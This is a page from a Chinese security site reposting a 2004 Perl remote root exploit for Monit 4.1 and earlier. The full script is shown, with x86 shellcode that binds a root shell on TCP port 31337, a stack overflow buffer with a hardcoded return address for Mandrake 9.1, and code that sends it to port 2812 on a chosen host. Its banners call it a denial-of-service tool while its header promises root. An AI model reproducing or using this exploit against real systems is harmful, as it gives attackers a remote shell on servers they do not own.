首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Monit <= 4.1 Remote Root Exploit
来源:vfocus.net 作者:gsicht 发布时间:2004-04-12  

Monit <= 4.1 Remote Root Exploit


#!/usr/bin/perl
#
# monit <= 4.1 remote root exploit
# coded by gsicht (09.04.04)
#

use IO::Socket::INET;
$socket = 0;

my $shellcode = # 8 + 88 = 96 bytes portbind 31337
"\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x90\x90\x90\x90\x90\x90\x90\x90" .
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .
"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" .
"\x89\xc7\x52\x66\x68" .
"\x7a\x69" . # port 31337/tcp, change if needed
"\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" .
"\xb0\x66\xb3\x04\xcd\x80" .
"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" .
"\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" .
"\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80";


print "\nmonit 4.1 dos exploit\n";
print "coded by gsicht\n\n";

if(@ARGV<1)
{
print "Usage: perl agate.pl <target>\n\n";
exit(0);
}

print "HOST:\t$ARGV[0]\n";
print "PORT:\t2812\n";


my $buffer = "B" x 284 . "\xcf\x89\xb3\x40" . $shellcode; # esp mandrake 9.1
#my $buffer = "A" x 284 . "XXXX" . "B" x 100; #dos and debug

print "connecting to server...\n";

$socket = IO::Socket::INET -> new( PeerAddr => $ARGV[0],
PeerPort => 2812,
Proto => "tcp");
if(!defined($socket))
{
print "could not connect :-P\n";
sleep(1);
exit(0);
}

print "connected\n";
sleep(1);
print "sending string\n";
print $socket $buffer;

close $socket;
print "\ndosed!\n";





 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Panda ActiveScan Control Remot
·Proof-of-concept exploit code
·FirstClass Desktop 7.1 buffer
·RogerWilco 0.4 remote exploit
·Tcpdump ISAKMP Identification
·Remote Exploit for Aborior's E
·Multiple Cisco Products Vulner
·Tcpdump ISAKMP payload Integer
·GV Local Buffer Overflow Explo
·IGI 2 <= 1.3 server RCON fo
·BlackJumboDog FTP Server Buffe
·Symantec Virus Detection Remot
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved